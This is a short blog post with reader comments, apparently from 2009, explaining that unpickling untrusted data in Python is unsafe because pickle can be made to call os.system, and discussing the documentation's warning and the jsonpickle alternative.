Why Python Pickle is Insecure. Because pickle is essentially a stack-based interpreter, so you can put os.system on the stack and use it to execute arbitrary commands.
Sign in with 
OpenID
Why Python Pickle is Insecure. Because pickle is essentially a stack-based interpreter, so you can put os.system on the stack and use it to execute arbitrary commands.
Which is documented very clearly here: http://docs.python.org/library/pickle.html
I think it's well worth talking about the reason for the warning. The docs just say: "The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source." Explaining that this actually means you can execute arbitrary OS level commands makes it far more likely people will take that warning seriously.
You might want to look at json-pickle. It may have the same problems but it's at least easier to read.
http://jsonpickle.googlecode.com/svn/docs/index.ht ml
Paul Hildebrandt - 10th September 2009 21:36 - #